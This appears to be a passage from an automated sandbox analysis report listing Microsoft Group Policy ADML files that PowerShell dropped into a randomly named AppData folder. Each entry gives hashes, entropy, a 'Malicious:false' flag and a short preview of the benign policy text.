                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TS_SUPPORTED_Windows8_or_ARM">At least Windows 8 or Windows RT</string>.. <string id="TS_SUPPORTED_Windows8_Server">At least Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_Windows8_Enterprise_AND_Server"> At least Windows 8 Enterprise or Windows Server 2012 R2</string>.. <string id="TS_SUPPORTED_ONLY_Windows7_OR_SERVER2K8R2">Windows 7 or Windows Server 2008 R2 (and their subsequent Service Packs) only</string>.. <string id="TS_SUPPORTED_ONLY_LEGACY">Windows Server 2008 R2, Windows Se

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Thumbnails.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2359
                                                                                                                                                                                                        Entropy (8bit):4.864135463263543
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKlmesQ6SmH6Se6dSGH6crboeoO6S86Ss6dS6H6cr3DJUlptRdpEFV:LeD5pm5mZymDm8rboB8OwAr3DJUlfv2n
                                                                                                                                                                                                        MD5:9DDDBE09EE87B401376670F58F52B8CB
                                                                                                                                                                                                        SHA1:3E3D3EFB918717C290B5E1FAAA19721160449A05
                                                                                                                                                                                                        SHA-256:36E567DB6F269F42865BC122835CBF10C7DE187AFF70BA93BA81C045486A134A
                                                                                                                                                                                                        SHA-512:10A5388C2C26BCAB4E38A9507A958BA2A33A09184F003632C51C9405376E43CE27E96C3F7812C51766DD71855ACD81F1ACF4B096EA263F44C2B9623663C04738
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableThumbnails">Turn off the display of thumbnails and only display icons.</string>.. <string id="DisableThumbnails_Help">This policy setting allows you to configure how File Explorer displays thumbnail images or icons on the local computer.....File Explorer displays thumbnail images by default. ....If you enable this policy setting, File Explorer displays only icons and never displays thumbnail images.....If you disable or do not configure this policy setting, File Explorer displays only thumbnail images.<

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\TouchInput.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2055
                                                                                                                                                                                                        Entropy (8bit):4.807218997990388
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKKU6oYecyziGWMlHqf+encFV:LeD5pm9HAd+FV
                                                                                                                                                                                                        MD5:9562339E02D38BECE2D7D3C89EE47766
                                                                                                                                                                                                        SHA1:1512A1230E2585B62FB78E1EE9E147FBCCF91D8F
                                                                                                                                                                                                        SHA-256:A376991D45DD68CD83E2A76C75F136B75033FDE16297EC2868755268AF2869E2
                                                                                                                                                                                                        SHA-512:531900F6AAADECA8DEF9C70F2E2D9A1A930237EE3E74CB1CF1172A2637DB340382E5108BD138F701CB533643EEA2514C2C43A1CC373B7F1EEB2FF103BCBF4AD5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TouchInput">Touch Input</string>.. <string id="TouchInputOff">Turn off Tablet PC touch input</string>.. <string id="TouchInputOff_Help">Turn off Tablet PC touch input....Turns off touch input, which allows the user to interact with their computer using their finger.....If you enable this setting, the user will not be able to produce input with touch. They will not be able to use touch input or touch gestures such as tap and double tap, the touch pointer, and other touch-specific features.....If you disabl

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\UserProfiles.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (658), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43896
                                                                                                                                                                                                        Entropy (8bit):4.667568456685799
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:FkIqBn46Y+xwhTjlMIbNzjWtqqnOTLTn8Gu/:Fkze+xwhTjlPWttSvnnA
                                                                                                                                                                                                        MD5:5F55E2D434E9BE9D2AC4108C2AE42106
                                                                                                                                                                                                        SHA1:6785C7EF4F183004F4F9CCF9D383DABF8914BFF3
                                                                                                                                                                                                        SHA-256:D9459CCAD7106CC5A8665076C9D74C39D211D11A6F33870385528389826264D9
                                                                                                                                                                                                        SHA-512:6109AEFDA8D656767F0A00C75F2241A454D85AA51B36338E1F5103A96BD32BB5B6571183132FD2468AE74A298623E7000A6F1C94F5760E55C92EB6DD01537BB0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AddAdminGroupToRUP">Add the Administrators security group to roaming user profiles</string>.. <string id="AddAdminGroupToRUP_Help">This policy setting adds the Administrator security group to the roaming user profile share.....Once an administrator has configured a user's roaming profile, the profile will be created at the user's next login. The profile is created at the location that is specified by the administrator.....For the Windows XP Professional and Windows 2000 Professional operating systems, the defa

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\VolumeEncryption.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1087), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):97809
                                                                                                                                                                                                        Entropy (8bit):4.865980267514194
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:yF3hamxu6iF2VflT2VfD7oaV6Z32VfDt2Kn+DZcZy:NYTNR96Zy
                                                                                                                                                                                                        MD5:11CDF6A637203126A5F35982F599C1AF
                                                                                                                                                                                                        SHA1:6E92BB3C55BAD050302EAFD9C7A722798B9FC0F1
                                                                                                                                                                                                        SHA-256:CC9BCBDB2FBBD9B3A529CFEFAEE37231BE9D712840E0FBD456D8AF9947E15F14
                                                                                                                                                                                                        SHA-512:AB39EA7CE5C379C90D4BAF6F4C506CDBDA17F29D75050CA10E713275EFAB609E0FBCD2B08E3D80E3F8EDCB410192B96C272789D10C1B71D9698B58BD75C6FE4A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDirectoryBackup_Help">This policy setting allows you to manage the Active Directory Domain Services (AD DS) backup of BitLocker Drive Encryption recovery information. This provides an administrative method of recovering data encrypted by BitLocker to prevent data loss due to lack of key information. This policy setting is only applicable to computers running Windows Server 2008 or Windows Vista.....If you enable this policy setting, BitLocker recovery information is automatically and silently backed up to AD

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\W32Time.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (721), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16499
                                                                                                                                                                                                        Entropy (8bit):4.944041721958569
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:A/mnOQzg68GwhRsw6uHGtY2PQJyGizYTO2jF4TTt:JnORtuYTOmF4TTt
                                                                                                                                                                                                        MD5:7FAF3A73C8DBAE90E511742BBB51AADD
                                                                                                                                                                                                        SHA1:D651E3B70B5C8A6CE7FDCD92D15189CB6880A361
                                                                                                                                                                                                        SHA-256:B62D8648EB65A947AE783F67A0E3F2276545DF1CD265CF4AA513DC53DF6882E0
                                                                                                                                                                                                        SHA-512:74A1533992353ADFD8E33365AE91DC7CF914A488D5E406D537344FE6F3565AB669DF221082E96DE47E172A4916B695B27499E129BAA9C8FB9B51C9EB264196BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="W32TIME_CONFIG_EXPLAIN">This policy setting allows you to specify Clock discipline and General values for the Windows Time service (W32time) for domain controllers including RODCs.....If you enable this policy setting, you can specify the following Clock discipline, General and RODC parameters for this service.....If you disable or do not configure this policy setting, Windows Time service uses the defaults of each of the following parameters.....Several of the following values are scalar, which means that they on

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WCM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (583), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5728
                                                                                                                                                                                                        Entropy (8bit):4.528195330790601
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmuOd2s+XGRFUv41c845cJ6RygNEfHZbWvK64kqo5UidD/PPTifE8h2WNOFV:EdOd2/XGbbqcSlNEf5CvWo5Ui9/n+MGW
                                                                                                                                                                                                        MD5:7D5B3A4F151213CB0EFDACFA335A6AA3
                                                                                                                                                                                                        SHA1:F36C9F3F58804077CE1AB9D41B29073D1E988752
                                                                                                                                                                                                        SHA-256:5EC9152E44738D44848AB532D269EC0D51612FD60B5FA8A7A3D53DC0395164A2
                                                                                                                                                                                                        SHA-512:C4DBFA582B75C32016FFE6AF8B5BEBFE2C9DBEB3A80BF1F8319CB1EAF76B043632E0E7A043457263EC41448A74C411920121EB194D04180E712C347F15F27EA7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Connection Manager Group Policy Settings</displayName>.. <description>Windows Connection Manager Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WCM_Category">Windows Connection Manager</string>.. <string id="WCM_BlockNonDomain">Prohibit connection to non-domain networks when connected to domain authenticated network</string>.. <string id="WCM_BlockNonDomain_Help">This policy setting prevents computers from connecting to both a domain based network and a non-domain based network at the same time... .. If this policy setting is enabled, the computer responds to automatic and manual networ

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WDI.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (513), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3666
                                                                                                                                                                                                        Entropy (8bit):4.76342138021097
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKMs4jm9y1YJWl5p0BsYlvPB9ZMKFdL5dbsEIqALJ/PUq1XWgV:LeD5pmYs4jkWlnCsKPB9ZRJHYV/PptV
                                                                                                                                                                                                        MD5:3C7A58453A2A54C65A82137819FCBFA2
                                                                                                                                                                                                        SHA1:635B1128546EA8A86DD984ADDE64BA1D0B8961A0
                                                                                                                                                                                                        SHA-256:4A49D6F192FF5E859FE003DB2584049D5F54615F80E5B977156F7D51F4752105
                                                                                                                                                                                                        SHA-512:DD3B7A0BE79E23F4B477080468B74BDA4D23730A2177DC4A092893718B2F0C2192AEB2885C60E0F2DF48AD0AA65E55535A61251325C1DFBB74844C867573139A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiDpsScenarioDataSizeLimitPolicy">Diagnostics: Configure scenario retention</string>.. <string id="WdiDpsScenarioDataSizeLimitPolicyExplain">This policy setting determines the data retention limit for Diagnostic Policy Service (DPS) scenario data.....If you enable this policy setting, you must enter the maximum size of scenario data that should be retained in megabytes. Detailed troubleshooting data related to scenarios will be retained until this limit is reached.....If you disable or do not configure this p

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WPN.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7410
                                                                                                                                                                                                        Entropy (8bit):4.5477372257913125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmIA4ik0bcMuEB4odMuQ0AuwsurKK4GA1TunDzDsZwuE7MteWQPyqyjV:EQkdMuEWCMuesurKKHKTuAwuE7MIWKxA
                                                                                                                                                                                                        MD5:77C2A2EB749EBCA17124B632612CE191
                                                                                                                                                                                                        SHA1:3B7F2E4594DB1D354755184C0127825F6A81E7D5
                                                                                                                                                                                                        SHA-256:058509712BF20A49CC276BDF4AB6B0CCDC3550501DA0F2C4529E234E9AAE6068
                                                                                                                                                                                                        SHA-512:6FC63B4998C6E746D82F5680FB67BE2CEADC227EFFE5A07DFF1E94E69A1711AD207EA4481DF25E722D57BBBCFD14F4C395C086D06E3071D1237099C8518AB313
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NotificationsCategory">Notifications</string>.. <string id="NoTileNotification">Turn off tile notifications</string>.. <string id="NoTileNotificationExplain">.. This policy setting turns off tile notifications..... If you enable this policy setting, applications and system features will not be able to update their tiles and tile badges in the Start screen..... If you disable or do not configure this policy setting, tile and badge notifications are enabled and can be turned off b

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WinCal.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1085
                                                                                                                                                                                                        Entropy (8bit):4.9989682223802285
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yIjoCg/IPGISwIIPFV:cgeD5x8gm8fK/DPlEIPFV
                                                                                                                                                                                                        MD5:8D40CA00FF9CB0AEABED1F9B98D06B2B
                                                                                                                                                                                                        SHA1:9B8819C7D0DB7C760990DE409BDE733A8BA179CC
                                                                                                                                                                                                        SHA-256:5D5FD8758FFCD1BCB7A28025E05D5749AC4B691ADF0B9E2589C096B75E5DC5C4
                                                                                                                                                                                                        SHA-512:4978350FE3A30EA539B38C0322D00F6853CE1227FB15859FD98BC8A655B4949E8B633622D41AC22552280624BE5E017A4566198BC6FF896A25A8BA83D8825AA8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffWinCal">Turn off Windows Calendar</string>.. <string id="TurnOffWinCal_Explain">Windows Calendar is a feature that allows users to manage appointments and tasks by creating personal calendars, publishing them, and subscribing to other users calendars.....If you enable this setting, Windows Calendar will be turned off.....If you disable or do not configure this setting, Windows Calendar will be turned on.....The default is for Windows Calendar to be turned on.</string>.. <string id="WinCal">Windows

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WinInit.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2477
                                                                                                                                                                                                        Entropy (8bit):4.814838125716894
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yaGryIBOKOxOZghgBMZvGM2MWIxTgbaoR01bF2jV:cgeD5x8gm8fKeBOVx2ghUD92YN7V
                                                                                                                                                                                                        MD5:0CDEAB62595877530194386C7F6A6661
                                                                                                                                                                                                        SHA1:1F0AA6E09C0C4123912F41639AB16534669D374E
                                                                                                                                                                                                        SHA-256:00FF3D345DDD3586734720DDDE1E688A31AC0CA468ED85B8A322CBCFD4BB03EE
                                                                                                                                                                                                        SHA-512:C1CE4AB1F1878E7DFE16DBC6065E9145EEB23914208F5C0A815D4DC18B4BFD5DF5BB588E6042F80E1EAB56001F5BFD8EF5F1CA061EF43D1440B3215FCE774B91
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNamedPipeShutdownPolicyDescription">Turn off legacy remote shutdown interface</string>.. <string id="DisableNamedPipeShutdownPolicyDescription_Help">This policy setting controls the legacy remote shutdown interface (named pipe). The named pipe remote shutdown interface is needed in order to shutdown this system from a remote Windows XP or Windows Server 2003 system.....If you enable this policy setting, the system does not create the named pipe remote shutdown interface.....If you disable or do not conf

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WinLogon.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (530), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8978
                                                                                                                                                                                                        Entropy (8bit):4.691590472306916
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ehq33S6hDBnHY0+4F1QvJNF1QmQcZNDoFYuu/+AsdegiYKECaVBMi8JfRs:mqBFUhYXZMi8c
                                                                                                                                                                                                        MD5:AD266AC436809BBDC0A19A05E80904A8
                                                                                                                                                                                                        SHA1:9515ABF43047427E1A13E2930C9AB6C171C6EA0B
                                                                                                                                                                                                        SHA-256:0E5BA42E689B38880E0DCB236FC16C4EB9E1809DC94CFCF5AA511B79FAFBA26F
                                                                                                                                                                                                        SHA-512:2B27F8DA69CDFB4423C954DC402FD7234C9F462E849F2687FFFD9E00CDEF23FF5EFA8D7A59E7640BAFC96633C0929A0136F5DCED52CA1ECD8ED2C15FBA8D1DC7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisplayLastLogonInfoDescription">Display information about previous logons during user logon</string>.. <string id="DisplayLastLogonInfoDescription_Help">This policy setting controls whether or not the system displays information about previous logons and logon failures to the user.....For local user accounts and domain user accounts in domains of at least a Windows Server 2008 functional level, if you enable this setting, a message appears after the user logs on that displays the date and time of the last suc

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Windows.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7341
                                                                                                                                                                                                        Entropy (8bit):5.050859952546844
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:7t/qF4BH/2pten9EVDEVhclKekhlJDnfQn:8bAeYlJDnU
                                                                                                                                                                                                        MD5:091AE0EC426BBE821C7C4A313FA3E5A5
                                                                                                                                                                                                        SHA1:013191A0FEF6551C71BCBD5823D0DC6C02867906
                                                                                                                                                                                                        SHA-256:FD871C109B4BE893167D85E6C37792B70E2F251DDB9370D039161E3FE735BDCC
                                                                                                                                                                                                        SHA-512:9971AB9D1272594663E6BDEC25110E6116B39C5101C70177ED846E3D4D78A8FE8F23326D559B0D420404D1ADE94AD93FC774000A6B1B372583D54863F5B34A72
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by operating system components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsVistaOrServer2008Only">Windows Server 2008 and Windows Vista</string>.. <string id="SUPPORTED_AllowWebPrinting">Windows 2000 or later, running IIS. Not supported on Windows Server 2003.</string>.. <string id="SUPPORTED_IE6SP1">At least Internet Explorer 6 Service Pack 1</string>.. <string id="SUPPORTED_Win2k">At least Windows 2000</string>.. <s

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsAnytimeUpgrade.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1059
                                                                                                                                                                                                        Entropy (8bit):5.0665762842091135
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFvHzJCFEpFlurFV:cgeD5x8gm8fKeLoFalurFV
                                                                                                                                                                                                        MD5:42A08790F9D22D63FC6D832BC97CAB7C
                                                                                                                                                                                                        SHA1:1EAADF4115A41993AEA94D99AD23034C88DA243B
                                                                                                                                                                                                        SHA-256:38866CDAD4284842C711350A8E5E9A0E3743B21BB66F0D849073FD73D4137A0F
                                                                                                                                                                                                        SHA-512:4DC9EC52BE0CA470CCAE39A62E6674610151BDA10395874548A47036EDF72C861A016D66B3ED38A1892BCB17B3A67A3371B6D29C7A1B37B76321064B6A81288D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WAU">Add features to Windows 8.1</string>.. <string id="WAU_Help">Contains settings to control the behavior of the Add features to Windows 8.1 wizard.</string>.. <string id="DisableWAU">Prevent the wizard from running.</string>.. <string id="DisableWAU_Help">By default, Add features to Windows 8.1 is available for all administrators. ....If you enable this policy setting, the wizard will not run.....If you disable this policy setting or set it to Not Configured, the wizard will run.</string>.. </s

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsBackup.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3483
                                                                                                                                                                                                        Entropy (8bit):4.819976484985464
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5J8FGj3Hzx+h1Pi1DjP3xYPXUrP/bFV:LeD5OuLFV
                                                                                                                                                                                                        MD5:8015A772382BE975C6E6145B1A25F71A
                                                                                                                                                                                                        SHA1:4B8773056C6F34C2BF2463E2FC9C346BA73BB221
                                                                                                                                                                                                        SHA-256:33A81CBC22929DB64640E0DA5046F30634F5B9DC9271F9601CA7ABCBC0E656D7
                                                                                                                                                                                                        SHA-512:61C05CEEC442EB66BFFC11ED4D303D15A15E5D385B62D7118EC3354FB07CDE6EB95A6A98D3828BB213122C98606333B7A7EF72B4719B79D3B07175D50FF3DA8D
                                                                                                                                                                                                        Malicious:false
